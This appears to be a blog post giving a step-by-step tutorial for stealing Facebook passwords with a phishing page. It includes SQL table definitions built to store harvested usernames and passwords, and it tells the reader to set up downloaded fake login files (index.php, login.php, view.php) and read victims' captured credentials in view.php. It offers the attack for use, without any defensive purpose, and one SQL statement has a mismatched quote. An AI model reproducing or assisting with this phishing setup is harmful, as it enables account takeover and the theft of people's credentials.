5 Steps How To Hack Facebook Account Password
Requirement:
1. Facebook Offline Page2. MySQL Table Query(The MySQL Table For This tutorial)
--
-- Table structure for table `fb_fail`
--
CREATE TABLE IF NOT EXISTS `fb_fail` (
`id` int(10) NOT NULL AUTO_INCREMENT,
`uname` varchar(255) NOT NULL,
`pwd` varchar(255) NOT NULL,
`date` datetime NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;
-- --------------------------------------------------------
--
-- Table structure for table `fb_login`
--
CREATE TABLE IF NOT EXISTS `fb_login' (
`id` int(10) NOT NULL AUTO_INCREMENT,
`uname` varchar(255) NOT NULL,
`pwd` varchar(255) NOT NULL,
`date` datetime NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=2 ;
--
-- Dumping data for table `fb_login`
--
5 Steps How To Hack Facebook Account Password
Download the facebook offline file
Inside the facebook.rar file there are 3 files (index.php, login.php, and view.php) you need to configure 2 of them (login.php and view.php) to match with your database server configuration.
In this third step, you can view my previous tutorial about how to hack facebook account using phishing method.(see the post here)
This is the fake facebook page interface preview screenshot using my browser.
If someone logged in, we can view the harvested passwords in view.php page.
No comments: